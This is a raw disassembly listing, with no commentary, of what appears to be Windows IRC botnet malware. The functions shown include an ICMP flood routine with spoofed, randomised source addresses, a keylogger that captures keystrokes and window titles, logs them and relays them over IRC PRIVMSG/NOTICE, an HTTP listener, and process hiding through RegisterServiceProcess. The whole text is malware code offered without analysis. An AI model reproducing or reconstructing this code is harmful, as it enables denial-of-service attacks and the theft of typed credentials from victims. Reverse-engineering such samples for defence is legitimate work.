cmp eax, 0FFFFFFFFh
jz loc_40591D
mov edx, [ebp+var_128]
xor ecx, ecx
test edx, edx
jbe short loc_4056CB
loc_4056BD: ; CODE XREF: sub_40558B+13E�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_4056CB
inc ecx
cmp ecx, edx
jb short loc_4056BD
loc_4056CB: ; CODE XREF: sub_40558B+130�j
; sub_40558B+139�j
cmp ecx, edx
jnz short loc_4056E1
cmp edx, 40h
jnb short loc_4056E1
mov [ebp+ecx*4+var_124], eax
inc [ebp+var_128]
loc_4056E1: ; CODE XREF: sub_40558B+142�j
; sub_40558B+147�j
cmp eax, [ebp+var_4]
jbe loc_40591D
mov [ebp+var_4], eax
jmp loc_40591D
; ---------------------------------------------------------------------------
loc_4056F2: ; CODE XREF: sub_40558B+102�j
mov edx, 400h
xor eax, eax
mov ecx, edx
lea edi, [ebp+var_28F0]
rep stosd
push eax
mov ecx, edx
lea edi, [ebp+var_18F0]
rep stosd
push 1000h
lea eax, [ebp+var_28F0]
push eax
push esi
call dword_43A324 ; recv
test eax, eax
jg short loc_405776
push esi
call dword_43A4D0 ; closesocket
xor eax, eax
cmp [ebp+var_128], eax
jbe loc_40591D
loc_40573A: ; CODE XREF: sub_40558B+1BF�j
cmp [ebp+eax*4+var_124], esi
jz short loc_405760
inc eax
cmp eax, [ebp+var_128]
jb short loc_40573A
jmp loc_40591D
; ---------------------------------------------------------------------------
loc_405751: ; CODE XREF: sub_40558B+1DE�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
inc eax
loc_405760: ; CODE XREF: sub_40558B+1B6�j
mov ecx, [ebp+var_128]
dec ecx
cmp eax, ecx
jb short loc_405751
dec [ebp+var_128]
jmp loc_40591D
; ---------------------------------------------------------------------------
loc_405776: ; CODE XREF: sub_40558B+198�j
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_340]
rep stosd
lea eax, [ebp+var_28F0]
xor ebx, ebx
xor esi, esi
lea ecx, [eax+1]
loc_405790: ; CODE XREF: sub_40558B+20A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405790
sub eax, ecx
mov [ebp+var_C], eax
jz loc_40591A
loc_4057A2: ; CODE XREF: sub_40558B+2D0�j
mov al, [ebp+ebx+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_405845
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jz short loc_40581F
lea eax, [ebp+var_18F0]
lea edx, [eax+1]
loc_4057D9: ; CODE XREF: sub_40558B+253�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4057D9
sub eax, edx
cmp eax, 5
jbe short loc_40581F
mov eax, offset asc_422B00 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_417440
pop ecx
pop ecx
push eax
call sub_417440
pop ecx
pop ecx
push eax
call sub_4177E9
pop ecx
pop ecx
lea edx, [ebp+var_340]
loc_405813: ; CODE XREF: sub_40558B+290�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_405813
jmp short loc_405833
; ---------------------------------------------------------------------------
loc_40581F: ; CODE XREF: sub_40558B+243�j
; sub_40558B+25A�j
push 3
mov edi, offset asc_4239E8 ; "\r\n"
lea esi, [ebp+var_18F0]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_405866
loc_405833: ; CODE XREF: sub_40558B+292�j
xor eax, eax
mov ecx, 400h
lea edi, [ebp+var_18F0]
rep stosd
or esi, 0FFFFFFFFh
loc_405845: ; CODE XREF: sub_40558B+227�j
lea eax, [ebp+var_28F0]
inc ebx
inc esi
lea ecx, [eax+1]
loc_405850: ; CODE XREF: sub_40558B+2CA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405850
sub eax, ecx
cmp ebx, eax
jb loc_4057A2
jmp loc_40591A
; ---------------------------------------------------------------------------
loc_405866: ; CODE XREF: sub_40558B+2A6�j
mov ecx, [ebp+var_128]
xor eax, eax
test ecx, ecx
jbe short loc_4058A5
loc_405872: ; CODE XREF: sub_40558B+2F6�j
mov edx, [ebp+eax*4+var_124]
cmp edx, [ebp+arg_0]
jz short loc_40589A
inc eax
cmp eax, ecx
jb short loc_405872
jmp short loc_4058A5
; ---------------------------------------------------------------------------
loc_405885: ; CODE XREF: sub_40558B+312�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ecx, [ebp+var_128]
inc eax
loc_40589A: ; CODE XREF: sub_40558B+2F1�j
dec ecx
cmp eax, ecx
jb short loc_405885
dec [ebp+var_128]
loc_4058A5: ; CODE XREF: sub_40558B+2E5�j
; sub_40558B+2F8�j
lea eax, [ebp+var_340]
lea edx, [eax+1]
loc_4058AE: ; CODE XREF: sub_40558B+328�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4058AE
sub eax, edx
mov esi, eax
lea eax, [ebp+var_464]
lea ecx, [eax+1]
loc_4058C2: ; CODE XREF: sub_40558B+33C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4058C2
sub eax, ecx
add eax, esi
cmp eax, 104h
jnb short loc_405911
and [ebp+var_C], 0
lea eax, [ebp+var_C]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_43A354 ; ioctlsocket
push [ebp+var_358]
lea eax, [ebp+var_340]
push [ebp+var_34C]
push eax
lea eax, [ebp+var_464]
push eax
push [ebp+arg_0]
call sub_4052D1
add esp, 14h
jmp short loc_40591A
; ---------------------------------------------------------------------------
loc_405911: ; CODE XREF: sub_40558B+347�j
push [ebp+arg_0]
call dword_43A4D0 ; closesocket
loc_40591A: ; CODE XREF: sub_40558B+211�j
; sub_40558B+2D6�j ...
mov ebx, [ebp+var_8]
loc_40591D: ; CODE XREF: sub_40558B+FA�j
; sub_40558B+120�j ...
mov esi, [ebp+arg_0]
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jbe loc_405675
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov eax, [ebp+var_4]
inc eax
loc_405940: ; CODE XREF: sub_40558B+E0�j
lea esi, [ebp+var_128]
lea edi, [ebp+var_23C]
push eax
rep movsd
call dword_43A468 ; select
cmp eax, 0FFFFFFFFh
jnz loc_405670
loc_40595E: ; CODE XREF: sub_40558B+66�j
; sub_40558B+8D�j ...
call dword_43A47C ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset aHttpdErrorServ ; "[HTTPD]: Error: server failed, returned"...
push eax
call sub_416975
xor esi, esi
add esp, 0Ch
cmp [ebp+var_350], esi
jnz short loc_4059A6
push esi
push [ebp+var_354]
lea eax, [ebp+var_8F0]
push eax
lea eax, [ebp+var_6EC]
push eax
push [ebp+var_6F0]
call sub_405D62
add esp, 14h
loc_4059A6: ; CODE XREF: sub_40558B+3F6�j
lea eax, [ebp+var_8F0]
push eax
call sub_401F0F
pop ecx
push ebx
call dword_43A4D0 ; closesocket
push [ebp+var_358]
call sub_4139F6
pop ecx
push esi
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_40558B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4059CE proc near ; DATA XREF: sub_409848+3008�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
pop ecx
mov esi, eax
lea edi, [ebp+var_1BC]
rep movsd
push 0FFh
xor esi, esi
push 3
inc esi
push 2
mov [eax+19Ch], esi
call dword_43A3BC ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_405A35
call dword_43A47C ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSocke ; "[ICMP]: Error: socket() failed, returne"...
push eax
call sub_416975
add esp, 0Ch
xor esi, esi
loc_405A27: ; CODE XREF: sub_4059CE+9C�j
; sub_4059CE+C3�j
cmp [ebp+var_24], esi
jnz loc_405C89
jmp loc_405C69
; ---------------------------------------------------------------------------
loc_405A35: ; CODE XREF: sub_4059CE+3A�j
push 4
lea ecx, [ebp+var_C]
push ecx
mov [ebp+var_C], esi
push 2
xor esi, esi
push esi
push eax
call dword_43A3D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_405A6C
call dword_43A47C ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSetso ; "[ICMP]: Error: setsockopt() failed, ret"...
push eax
call sub_416975
add esp, 0Ch
jmp short loc_405A27
; ---------------------------------------------------------------------------
loc_405A6C: ; CODE XREF: sub_4059CE+7F�j
lea eax, [ebp+var_1B8]
push eax
call dword_43A434 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_405A93
lea eax, [ebp+var_3BC]
push offset aIcmpInvalidTar ; "[ICMP]: Invalid target IP."
push eax
call sub_416975
pop ecx
pop ecx
jmp short loc_405A27
; ---------------------------------------------------------------------------
loc_405A93: ; CODE XREF: sub_4059CE+AE�j
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
push esi
mov [ebp+var_1C], 2
call dword_43A514 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_43A434 ; inet_addr
mov ebx, dword_422004
mov [ebp+var_18], eax
mov [ebp+arg_0], esi
call ebx ; GetTickCount
mov [ebp+var_8], eax
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_405C21
mov esi, 100h
loc_405AE7: ; CODE XREF: sub_4059CE+24B�j
push 41Ch
mov byte_439F08, 45h
call dword_43A514 ; ntohs
mov word_439F0A, ax
xor eax, eax
cmp [ebp+var_2C], eax
mov word_439F0C, 1
mov word_439F0E, ax
mov byte_439F10, 80h
mov byte_439F11, 1
mov word_439F12, ax
jz short loc_405B56
call sub_416B31
mov edi, eax
shl edi, 8
call sub_416B31
add edi, eax
shl edi, 8
call sub_416B31
add edi, eax
shl edi, 8
call sub_416B31
add edi, eax
mov dword_439F14, edi
jmp short loc_405B6E
; ---------------------------------------------------------------------------
loc_405B56: ; CODE XREF: sub_4059CE+159�j
push [ebp+var_1BC]
call sub_408894
pop ecx
push eax
call dword_43A434 ; inet_addr
mov dword_439F14, eax
loc_405B6E: ; CODE XREF: sub_4059CE+186�j
mov eax, [ebp+var_18]
mov dword_439F18, eax
call sub_416B31
cdq
mov ecx, esi
idiv ecx
mov byte_439F1C, dl
call sub_416B31
cdq
mov ecx, esi
idiv ecx
mov byte_439F1D, dl
call sub_416B31
cdq
mov ecx, 0F0h
idiv ecx
and word_439F1E, 0
mov word_439F22, 1
inc edx
mov word_439F20, dx
call sub_416B31
cdq
mov ecx, 0FFh
idiv ecx
push 10h
mov edi, offset dword_439F24
mov al, dl
mov cl, al
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, esi
rep stosd
lea eax, [ebp+var_1C]
push eax
xor edi, edi
push edi
push 41Ch
push offset byte_439F08
push [ebp+var_4]
call dword_43A38C ; sendto
cmp eax, 0FFFFFFFFh
jz loc_405CA6
inc [ebp+arg_0]
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
jbe loc_405AE7
xor esi, esi
loc_405C21: ; CODE XREF: sub_4059CE+10E�j
push [ebp+var_4]
call dword_43A4D0 ; closesocket
mov eax, [ebp+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpDoneWithSF ; "[ICMP]: Done with %s flood to IP: %s. S"...
push eax
call sub_416975
add esp, 1Ch
cmp [ebp+var_24], esi
jnz short loc_405C89
loc_405C69: ; CODE XREF: sub_4059CE+62�j
push esi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_405D62
add esp, 14h
loc_405C89: ; CODE XREF: sub_4059CE+5C�j
; sub_4059CE+299�j
lea eax, [ebp+var_3BC]
push eax
call sub_401F0F
push [ebp+var_38]
call sub_4139F6
pop ecx
pop ecx
push esi
loc_405CA0: ; CODE XREF: sub_4059CE+347�j
call dword_422014 ; ExitThread
loc_405CA6: ; CODE XREF: sub_4059CE+231�j
push [ebp+var_4]
call dword_43A4D0 ; closesocket
call dword_43A47C ; WSAGetLastError
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
push offset aIcmpErrorSendi ; "[ICMP]: Error sending packets to IP: %s"...
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_416BCD
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_405CFE
push edi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_405D62
add esp, 14h
loc_405CFE: ; CODE XREF: sub_4059CE+30E�j
lea eax, [ebp+var_3BC]
push eax
call sub_401F0F
push [ebp+var_38]
call sub_4139F6
pop ecx
pop ecx
push edi
jmp short loc_405CA0
sub_4059CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405D17 proc near ; CODE XREF: sub_40946D+40�p
; sub_409848+1B8�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push 200h
push eax
call sub_416C24
lea eax, [ebp+var_200]
add esp, 10h
lea edx, [eax+1]
loc_405D44: ; CODE XREF: sub_405D17+32�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405D44
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43A458 ; send
leave
retn
sub_405D17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405D62 proc near ; CODE XREF: start+B2�p sub_4010CA+61�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_405D7D
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_405D7D: ; CODE XREF: sub_405D62+14�j
mov eax, edi
lea edx, [eax+1]
loc_405D82: ; CODE XREF: sub_405D62+25�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405D82
sub eax, edx
mov esi, eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_405D93: ; CODE XREF: sub_405D62+36�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405D93
push [ebp+arg_8]
sub eax, ecx
mov ecx, 1FAh
sub ecx, eax
push offset aS_2 ; "%s"
sub ecx, esi
push ecx
lea eax, [ebp+var_400]
push eax
call sub_416BCD
lea eax, [ebp+var_400]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_416975
add esp, 24h
lea eax, [ebp+var_200]
pop edi
lea ecx, [eax+1]
pop esi
loc_405DE4: ; CODE XREF: sub_405D62+87�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405DE4
push 0
sub eax, ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43A458 ; send
cmp [ebp+arg_10], 0
jz short locret_405E11
push 0FAh
call dword_422000 ; Sleep
locret_405E11: ; CODE XREF: sub_405D62+A2�j
leave
retn
sub_405D62 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E13 proc near ; CODE XREF: sub_405F16+B0�p
; sub_405F16+24B�p
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
push esi
push edi
lea eax, [ebp+var_10]
push eax
call dword_422028 ; GetLocalTime
push 104h
lea eax, [ebp+var_114]
push eax
call dword_422048 ; GetSystemDirectoryA
lea edi, [ebp+var_114]
dec edi
loc_405E41: ; CODE XREF: sub_405E13+34�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_405E41
mov esi, offset asc_423B60 ; "\\"
mov eax, offset dword_42FD5C
movsw
mov edx, eax
loc_405E57: ; CODE XREF: sub_405E13+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405E57
lea edi, [ebp+var_114]
sub eax, edx
dec edi
loc_405E67: ; CODE XREF: sub_405E13+5A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_405E67
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea eax, [ebp+var_114]
and ecx, 3
push offset aAb ; "ab"
push eax
rep movsb
call sub_41720C
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_405E9B
inc eax
jmp short loc_405F12
; ---------------------------------------------------------------------------
loc_405E9B: ; CODE XREF: sub_405E13+83�j
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi
call sub_4178A4
push esi
call sub_416E7D
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_405F10
push [ebp+arg_0]
lea eax, [ebp+var_314]
push offset aKeylogS ; "[KEYLOG]: %s"
push 200h
push eax
call sub_416BCD
push 0
push [ebp+arg_8C]
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
call sub_405D62
add esp, 24h
loc_405F10: ; CODE XREF: sub_405E13+C4�j
xor eax, eax
loc_405F12: ; CODE XREF: sub_405E13+86�j
pop edi
pop esi
leave
retn
sub_405E13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_405F16 proc near ; DATA XREF: sub_409848+1E2F�o
var_8E0 = dword ptr -8E0h
var_8DC = byte ptr -8DCh
var_4E0 = byte ptr -4E0h
var_2E1 = byte ptr -2E1h
var_2E0 = byte ptr -2E0h
var_E0 = byte ptr -0E0h
var_DC = dword ptr -0DCh
var_4C = byte ptr -4Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 8E0h
mov eax, [ebp+74h+arg_0]
and [ebp+74h+var_8E0], 0
and [ebp+74h+var_4], 0
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+74h+var_E0]
rep movsd
mov dword ptr [eax+90h], 1
xor eax, eax
mov ecx, 0FFh
lea edi, [ebp+74h+var_8DC]
rep stosd
call dword_43A380 ; GetForegroundWindow
push 3Ch
lea ecx, [ebp+74h+var_4C]
push ecx
push eax
mov [ebp+74h+var_8], eax
call dword_43A370 ; GetWindowTextA
mov ebx, 80h
loc_405F70: ; CODE XREF: sub_405F16+2E9�j
push 8
call dword_422000 ; Sleep
call dword_43A380 ; GetForegroundWindow
cmp eax, [ebp+74h+var_8]
jz short loc_405FEA
push 3Ch
lea ecx, [ebp+74h+var_4C]
push ecx
push eax
mov [ebp+74h+var_8], eax
call dword_43A370 ; GetWindowTextA
lea eax, [ebp+74h+var_4C]
push eax
lea eax, [ebp+74h+var_2E0]
push eax
lea eax, [ebp+74h+var_4E0]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax
call sub_416975
sub esp, 84h
push 25h
pop ecx
lea eax, [ebp+74h+var_4E0]
mov edi, esp
lea esi, [ebp+74h+var_E0]
push eax
rep movsd
call sub_405E13
add esp, 98h
mov [ebp+74h+var_4], eax
xor eax, eax
mov ecx, ebx
lea edi, [ebp+74h+var_2E0]
rep stosd
mov ecx, ebx
lea edi, [ebp+74h+var_4E0]
rep stosd
loc_405FEA: ; CODE XREF: sub_405F16+6B�j
mov [ebp+74h+arg_0], offset dword_42E59C
loc_405FF1: ; CODE XREF: sub_405F16+2DF�j
push 10h
call dword_43A4E4 ; GetKeyState
movsx edi, ax
mov eax, [ebp+74h+arg_0]
mov esi, [eax-4]
push esi
call dword_43A360 ; GetAsyncKeyState
test ah, ah
jns short loc_406088
push 14h
call dword_43A4E4 ; GetKeyState
test ax, ax
jz short loc_406039
cmp edi, 0FFFFFFFFh
jle short loc_406039
cmp esi, 40h
jle short loc_406039
cmp esi, 5Bh
jge short loc_406039
mov [ebp+esi*4+74h+var_8E0], 1
jmp loc_4061EA
; ---------------------------------------------------------------------------
loc_406039: ; CODE XREF: sub_405F16+102�j
; sub_405F16+107�j ...
push 14h
call dword_43A4E4 ; GetKeyState
test ax, ax
jz short loc_406064
test edi, edi
jge short loc_406078
cmp esi, 40h
jle short loc_406064
cmp esi, 5Bh
jge short loc_406064
mov [ebp+esi*4+74h+var_8E0], 2
jmp loc_4061EA
; ---------------------------------------------------------------------------
loc_406064: ; CODE XREF: sub_405F16+12E�j
; sub_405F16+137�j ...
test edi, edi
jge short loc_406078
mov [ebp+esi*4+74h+var_8E0], 3
jmp loc_4061EA
; ---------------------------------------------------------------------------
loc_406078: ; CODE XREF: sub_405F16+132�j
; sub_405F16+150�j
mov [ebp+esi*4+74h+var_8E0], 4
jmp loc_4061EA
; ---------------------------------------------------------------------------
loc_406088: ; CODE XREF: sub_405F16+F5�j
lea eax, [ebp+esi*4+74h+var_8E0]
mov edx, [eax]
test edx, edx
jz loc_4061EA
and dword ptr [eax], 0
cmp esi, 8
lea eax, [ebp+74h+var_2E0]
jnz short loc_4060BF
lea edx, [eax+1]
loc_4060AA: ; CODE XREF: sub_405F16+199�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4060AA
sub eax, edx
and [ebp+eax+74h+var_2E1], cl
jmp loc_4061EA
; ---------------------------------------------------------------------------
loc_4060BF: ; CODE XREF: sub_405F16+18F�j
lea edi, [eax+1]
loc_4060C2: ; CODE XREF: sub_405F16+1B1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4060C2
sub eax, edi
cmp eax, 1B9h
jbe short loc_4060F7
call dword_43A380 ; GetForegroundWindow
push 3Ch
lea ecx, [ebp+74h+var_4C]
push ecx
push eax
call dword_43A370 ; GetWindowTextA
lea eax, [ebp+74h+var_4C]
push eax
lea eax, [ebp+74h+var_2E0]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_40613E
; ---------------------------------------------------------------------------
loc_4060F7: ; CODE XREF: sub_405F16+1BA�j
cmp esi, 0Dh
jnz loc_406187
lea eax, [ebp+74h+var_2E0]
lea edx, [eax+1]
loc_406109: ; CODE XREF: sub_405F16+1F8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406109
sub eax, edx
mov [ebp+74h+var_C], eax
jz loc_4061EA
call dword_43A380 ; GetForegroundWindow
push 3Ch
lea ecx, [ebp+74h+var_4C]
push ecx
push eax
call dword_43A370 ; GetWindowTextA
lea eax, [ebp+74h+var_4C]
push eax
lea eax, [ebp+74h+var_2E0]
push eax
push offset aSReturnS ; "%s (Return) (%s)"
loc_40613E: ; CODE XREF: sub_405F16+1DF�j
lea eax, [ebp+74h+var_4E0]
push eax
call sub_416975
sub esp, 84h
push 25h
pop ecx
lea eax, [ebp+74h+var_4E0]
mov edi, esp
lea esi, [ebp+74h+var_E0]
push eax
rep movsd
call sub_405E13
add esp, 98h
mov [ebp+74h+var_4], eax
xor eax, eax
mov ecx, ebx
lea edi, [ebp+74h+var_2E0]
rep stosd
mov ecx, ebx
lea edi, [ebp+74h+var_4E0]
rep stosd
jmp short loc_4061EA
; ---------------------------------------------------------------------------
loc_406187: ; CODE XREF: sub_405F16+1E4�j
cmp edx, 1
jz short loc_4061BA
cmp edx, 3
jz short loc_4061BA
cmp edx, 2
jz short loc_40619B
cmp edx, 4
jnz short loc_4061EA
loc_40619B: ; CODE XREF: sub_405F16+27E�j
mov eax, [ebp+74h+arg_0]
mov edx, eax
loc_4061A0: ; CODE XREF: sub_405F16+28F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4061A0
lea edi, [ebp+74h+var_2E0]
sub eax, edx
dec edi
loc_4061B0: ; CODE XREF: sub_405F16+2A0�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4061B0
jmp short loc_4061DA
; ---------------------------------------------------------------------------
loc_4061BA: ; CODE XREF: sub_405F16+274�j
; sub_405F16+279�j
mov eax, [ebp+74h+arg_0]
add eax, 7
mov edx, eax
loc_4061C2: ; CODE XREF: sub_405F16+2B1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4061C2
lea edi, [ebp+74h+var_2E0]
sub eax, edx
dec edi
loc_4061D2: ; CODE XREF: sub_405F16+2C2�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4061D2
loc_4061DA: ; CODE XREF: sub_405F16+2A2�j
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_4061EA: ; CODE XREF: sub_405F16+11E�j
; sub_405F16+149�j ...
add [ebp+74h+arg_0], 14h
cmp [ebp+74h+arg_0], offset dword_42ECCC
jl loc_405FF1
cmp [ebp+74h+var_4], 0
jz loc_405F70
push [ebp+74h+var_DC]
call sub_4139F6
pop ecx
push 0
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_405F16 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_406217 proc near ; CODE XREF: sub_40FB4C+4B�p
push ebx
push ebp
mov ebp, dword_4220A4
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, dword_422084
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_406337
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_43A394, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_43A3AC, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_43A40C, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_43A364, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_43A3D4, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_43A3B8, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_43A460, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_43A33C, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_43A3DC, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_43A404, eax
call esi ; GetProcAddress
cmp dword_43A394, ebx
mov dword_43A46C, eax
jz short loc_406315
cmp dword_43A3AC, ebx
jz short loc_406315
cmp dword_43A40C, ebx
jz short loc_406315
cmp dword_43A364, ebx
jz short loc_406315
cmp dword_43A3B8, ebx
jz short loc_406315
cmp dword_43A460, ebx
jz short loc_406315
cmp dword_43A33C, ebx
jz short loc_406315
cmp dword_43A3DC, ebx
jz short loc_406315
cmp dword_43A404, ebx
jz short loc_406315
cmp eax, ebx
jnz short loc_40631F
loc_406315: ; CODE XREF: sub_406217+B8�j
; sub_406217+C0�j ...
mov dword_43A518, 1
loc_40631F: ; CODE XREF: sub_406217+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_43A4C0, eax
jz short loc_40634C
push 1
push ebx
call eax
jmp short loc_40634C
; ---------------------------------------------------------------------------
loc_406337: ; CODE XREF: sub_406217+1D�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A51C, eax
mov dword_43A518, 1
loc_40634C: ; CODE XREF: sub_406217+117�j
; sub_406217+11E�j
push offset aUser32_dll ; "user32.dll"
call dword_422088 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_406461
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_43A484, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
